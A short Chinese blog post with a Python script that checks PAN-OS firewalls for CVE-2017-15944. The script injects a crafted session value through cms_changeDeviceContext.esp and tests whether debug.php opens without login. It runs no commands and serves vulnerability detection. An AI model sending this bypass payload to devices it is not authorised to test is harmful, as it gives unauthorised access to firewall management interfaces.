早上看到 Palo Alto Networks firewalls 爆出 RCE 漏洞:http://seclists.org/fulldisclosure/2017/Dec/38
到公司后赶紧测试了一下,并写了 PoC:https://github.com/0xbug/CVE-2017-15944-POC
下面的脚本只检测注入会话变量后能否未授权访问 debug.php,并不执行任何命令。

import requests
import sys

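# Exposure check for CVE-2017-15944 on a PAN-OS management web interface.
#
# The script requests debug.php, sends one request that tries to inject a
# `user` value into the server-side session, then requests debug.php again
# and looks for the "Debug Console" marker. It only tests whether the page
# becomes reachable; it runs no command on the device.
#
# A "not vul" result means the marker string was not returned. It is not
# proof that the device is patched, so confirm the installed PAN-OS version
# against the vendor advisory for CVE-2017-15944 as well.
if len(sys.argv) > 1:
    # Strip trailing slashes so the joined paths do not begin with '//'.
    target = sys.argv[1].rstrip('/')

    create_session_url = '{}/esp/cms_changeDeviceContext.esp?device=aaaaa:a%27";user|s."1337";'.format(
        target)
    verify_url = '{}/php/utils/debug.php'.format(target)

    # Bound every request so an unresponsive host cannot hang the check.
    request_options = {'timeout': 10}
    # Test the scheme itself, not any occurrence of "https" in the URL.
    if target.lower().startswith('https://'):
        # Certificate validation is turned off (presumably because the
        # management interface uses a self-signed certificate). The verdict
        # can therefore be altered by anyone on the network path; run the
        # check from a trusted network segment.
        request_options['verify'] = False

    session = requests.Session()
    try:
        # First request: presumably obtains the session cookie that the
        # second request then tries to modify.
        session.get(verify_url, **request_options)
        session.get(create_session_url, **request_options)
        verify = session.get(verify_url, **request_options)
    except requests.RequestException as exc:
        # Report connection, TLS and malformed-URL errors as a failed check
        # instead of a traceback, and keep them apart from a real verdict.
        print('{} check failed: {}'.format(target, exc))
        sys.exit(1)

    if 'Debug Console' in verify.text:
        print('{} is vul'.format(target))
    else:
        print('{} is not vul'.format(target))
else:
    print('Usage: python panos-poc.py panurl')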
